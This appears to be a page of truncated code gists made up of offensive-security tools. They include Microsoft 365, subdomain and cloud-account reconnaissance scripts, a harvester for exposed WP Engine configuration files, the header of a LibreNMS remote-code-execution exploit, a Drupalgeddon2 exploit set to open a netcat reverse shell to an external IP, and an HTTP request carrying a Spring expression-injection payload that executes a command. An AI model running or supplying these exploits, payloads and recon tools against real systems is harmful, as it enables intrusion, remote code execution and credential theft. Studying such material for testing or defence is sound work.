| #!/usr/bin/env python3 | |
| """ | |
| Python script to enumerate valid Microsoft 365 domains, retrieve tenant name, and check for an MDI instance. | |
| Based on: https://github.com/thalpius/Microsoft-Defender-for-Identity-Check-Instance. | |
| Usage: ./check_mdi.py -d <domain> | |
| """ | |
| import argparse | |
| import dns.resolver |
| #!/bin/bash | |
| curl -s "https://urlscan.io/api/v1/search/?q=domain:$1" | grep -E '"url"' | cut -d '"' -f4 | grep -F $1 | sort -u |
| /* | |
| Developer: Marzavec ( https://github.com/marzavec ) | |
| Description: A simple browser-based subdomain bruteforcing script, using DoH providers. Developed as a 5 minute hack, just to see it's preformance. Many improvements could be made, such as adding error handling or informing the user when the script is done. | |
| Usage: Open the browsers dev console (usually F12), paste this script, change the `rootTld`, press enter to run. Ezpz. | |
| */ | |
| const rootTld = 'lyka.pro'; // change to your target's root tld | |
| // url to newline seperated wordlist | |
| const wordlistUrl = 'https://raw.githubusercontent.com/rbsec/dnscan/master/subdomains.txt'; |
| #!/bin/bash | |
| # If you find a site with /_wpeprivate/config.json file exposed, run this and get all kinds of fun goodies. | |
| # If it "no worked" (Technical Term) then you probably need to install jq! | |
| TARGET=$1 | |
| TARGETDOMAIN=$(echo $TARGET | cut -d/ -f3) | |
| # Pretty Colors | |
| RESET='\033[00m' | |
| GREEN='\033[01;32m' |
| # gcloud auth activate-service-account --key-file=85.json | |
| # gcloud projects list | |
| project="my-project" | |
| space="" | |
| echo "gcloud auth list" | |
| gcloud auth list | |
| echo -e "$space" |
| #!/usr/bin/python | |
| ''' | |
| # Exploit Title: LibreNMS v1.46 authenticated Remote Code Execution | |
| # Date: 24/12/2018 | |
| # Exploit Author: Askar (@mohammadaskar2) | |
| # CVE : CVE-2018-20434 | |
| # Vendor Homepage: https://www.librenms.org/ | |
| # Version: v1.46 | |
| # Tested on: Ubuntu 18.04 / PHP 7.2.10 |
| #!/bin/bash | |
| # Written by Frans Rosén (twitter.com/fransrosen) | |
| _debug="$2" #turn on debug | |
| _timeout="20" | |
| #you need a valid key, since the errors happens after it validates that the key exist. we do not need the secret key, only access key | |
| _aws_key="AKIA..." | |
| H_ACCEPT="accept-language: en-US,en;q=0.9,sv;q=0.8,zh-TW;q=0.7,zh;q=0.6,fi;q=0.5,it;q=0.4,de;q=0.3" | |
| H_AGENT="user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36" |
Source: https://gist.github.com/g0tmi1k/7476eec3f32278adc07039c3e5473708
Improved (Ruby) exploit ~ http://github.com/dreadlocked/Drupalgeddon2/ // https://www.exploit-db.com/exploits/44449/
| #!/bin/sh | |
| YOUR_EXTERNAL_IP="172.16.30.108" | |
| YOUR_NETCAT_PORT="6969" | |
| # Start up a netcat server | |
| # netcat -l 6969 | |
| HOST="http://drupal.docker.localhost:8000" | |
| PHP_FUNCTION="exec" |
| POST /users HTTP/1.1 | |
| Host: localhost:8080 | |
| Content-Type: application/x-www-form-urlencoded | |
| Content-Length: 164 | |
| username[#this.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec('xterm')")]=asdf |
